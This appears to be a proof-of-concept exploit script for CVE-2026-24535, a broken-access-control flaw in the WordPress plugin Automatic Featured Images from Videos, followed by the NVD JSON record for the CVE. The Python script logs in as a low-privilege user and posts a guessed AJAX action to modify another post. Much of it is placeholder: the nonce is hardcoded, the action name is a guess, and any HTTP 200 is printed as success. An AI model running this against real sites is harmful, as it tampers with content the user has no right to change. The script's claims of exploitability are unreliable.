CVE-2026-24535

# CVE-2026-24535 PoC - WordPress Automatic Featured Images from Videos Missing Authorization # This PoC demonstrates the Broken Access Control vulnerability import requests import sys from urllib.parse import urlencode # Configuration TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" # e.g., subscriber, contributor PASSWORD = "user_password" TARGET_POST_ID = 123 # Target post ID to modify VIDEO_URL = "https://example.com/video.mp4" def get_nonce_and_cookies(): """Login and get necessary tokens""" session = requests.Session() # Login login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } login_resp = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return None, None print("[+] Login successful") # Get nonce from plugin's admin page or inline # The nonce might be visible in the page source or through AJAX nonce_resp = session.get(f"{TARGET_URL}/wp-admin/post.php?post={TARGET_POST_ID}&action=edit") # Extract nonce - typically named _wpnonce or plugin-specific nonce # This is a placeholder - actual nonce extraction depends on plugin implementation nonce = "extracted_nonce_value" return session, nonce def exploit_missing_auth(): """Exploit the missing authorization vulnerability""" session, nonce = get_nonce_and_cookies() if not session: return False # Vulnerable AJAX endpoint ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Exploit payload - this varies based on plugin's implementation exploit_data = { 'action': 'afifv_process_video', # Plugin's AJAX action 'post_id': TARGET_POST_ID, 'video_url': VIDEO_URL, 'nonce': nonce # Nonce might not be properly validated for permissions } print(f"[*] Sending exploit request to {ajax_url}") print(f"[*] Target post ID: {TARGET_POST_ID}") response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print("[+] Exploit sent successfully") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Exploit failed with status code: {response.status_code}") return False if __name__ == "__main__": print("CVE-2026-24535 PoC - Missing Authorization in Automatic Featured Images from Videos") print("=" * 80) exploit_missing_auth()

{"cve": {"id": "CVE-2026-24535", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:09.577", "lastModified": "2026-04-28T15:16:11.270", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in webdevstudios Automatic Featured Images from Videos automatic-featured-images-from-videos allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Automatic Featured Images from Videos: from n/a through <= 1.2.7."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en webdevstudios Automatic Featured Images from Videos automatic-featured-images-from-videos permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Automatic Featured Images from Videos: desde n/a hasta &lt;= 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/automatic-featured-images-from-videos/vulnerability/wordpress-automatic-featured-images-from-videos-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}